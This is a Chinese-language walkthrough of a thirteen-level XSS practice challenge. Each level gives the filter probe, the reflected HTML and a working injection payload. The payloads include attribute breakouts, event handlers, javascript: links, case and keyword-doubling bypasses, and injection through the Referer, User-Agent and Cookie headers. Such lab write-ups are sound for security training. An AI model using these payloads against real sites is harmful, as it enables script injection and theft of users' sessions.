XSS挑战
level1
<'"/\>---> 未过滤
?name=<script>alert(/xss/)</script>
控制台: javascript:alert(/xss/) 通关所有
level2
-
<script "'Oonn><input name=keyword value="<script "'Oonn>">--->">闭合
-
payload:
"><img onerror=alert(/xss/) src="#----> 闭合前,闭合后<input name=keyword value=""><img onerror=alert(/xss/) src="#">
level3
-
<script "'Oonn><input name=keyword value='<script "'Oonn>'>--->"、<、>转码
-
payload:
' onmouseover='alert(/xss/)<input name=keyword value='' onmouseover='alert(/xss/)'>
level4
-
<script "'Oonn><input name=keyword value="script "'Oonn">---><、>过滤 ,"闭合
-
payload :
" onmouseover="alert(/xss/)<input name=keyword value="" onmouseover="alert(/xss/)">
level5
-
<script script "'Oonn><input name=keyword value="<scr_ipt script "'oo_nn>">---><script替换,On替换
-
payload :
"><a href="javascript:alert(/xss/)">click me!</a><input name=keyword value=""><a href="javascript:alert(/xss/)">click me!</a>">
level6
-
<script script "'OOnn><input name=keyword value="<scr_ipt script "'OOnn>">---><script替换,未做大小写替换
-
payload :
" Onmouseover="alert(/xss/)<input name=keyword value="" Onmouseover="alert(/xss/)">
-
payload :
"><a hREf="javascript:alert(/xss/)">click me!</a><input name=keyword value=""><a hREf="javascript:alert(/xss/)">click me!</a>">
level7
-
<script script "'OOnn><input name=keyword value="< "'on>">--><script、script过滤 ,On一次过滤
-
payload :
" OOnnmouseover="alert(/xss/)<input name=keyword value="" OOnnmouseover="alert(/xss/)">
level8
-
<script script "'OOnn></center><center><BR><a href="<scr_ipt scr_ipt "'oo_nn>">友情链接</a></center><center><img src=level8.jpg></center>---><script、script、on替换 ,"转码
-
javascript:alert(/xss/)--->c>c</center><center><BR><a href="javas&ript:alert(/xss/)">友情链接</a></center><center><img src=level8.jpg></center>
level9
-
<script script "'OOnn></center><center><BR><a href="您的链接不合法?有没有!">友情链接</a></center><center><img src=level9.png></center>---> 检测链接合法性
-
<script script "'OOnn>http://猜测其检测方式,只要包含有http://就合法</center><center><BR><a href="<scr_ipt scr_ipt "'oo_nn>http://">友情链接</a></center><center><img src=level9.png></center>
-
payload :
javascript:alert('http://')</center><center><BR><a href="javas&ript:alert('http://')">友情链接</a></center><center><img src=level8.jpg></center>
level10
-
?keyword=<script script "'OOnn>---> 无可用内容 -
?t_link=<script script "'OOnn><input name="t_link" value="" type="hidden">
-
?t_history=<script script "'OOnn><input name="t_history" value="" type="hidden">
-
?t_sort=<script script "'OOnn><input name="t_sort" value="script script "'OOnn" type="hidden">---><、>过滤
-
payload :
?t_sort=click me!" type="button" onclick="alert(/xss/)<input name="t_sort" value="click me!" type="button" onclick="alert(/xss/)" type="hidden">
level11
<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_ref" value="http://test.ctf8.com/level10.php?t_sort=click%20me!%22%20type=%22button%22%20onclick=%22alert(/xss/)" type="hidden">
t_ref 的值为 Referer 参数
拦截请求包修改:
-
Referer: <script script "'OOnn><input name="t_ref" value="script script "'OOnn" type="hidden">
-
payload :
Referer: click me!" type="button" onclick="alert(/xss/)<input name="t_ref" value="click me!" type="button" onclick="alert(/xss/)" type="hidden">
level12
<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.5.810 Yowser/2.5 Safari/537.36" type="hidden">
t_ua 的值为 User-Agent 参数
拦截请求包修改:
-
User-Agent: <script script "'OOnn><input name="t_ua" value="script script "'OOnn" type="hidden">
-
payload :
User-Agent: click me!" type="button" onclick="alert(/xss/)<input name="t_ua" value="click me!" type="button" onclick="alert(/xss/)" type="hidden">
level13
<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_cook" value="" type="hidden">
猜测 t_cook 值为 Cookie 的参数
拦截请求包修改:
-
Cookie: <script script "'OOnn><input name="t_cook" value="script script "'OOnn" type="hidden">
-
payload :
Cookie: click me!" type="button" onclick="alert(/xss/)<input name="t_cook" value="click me!" type="button" onclick="alert(/xss/)" type="hidden">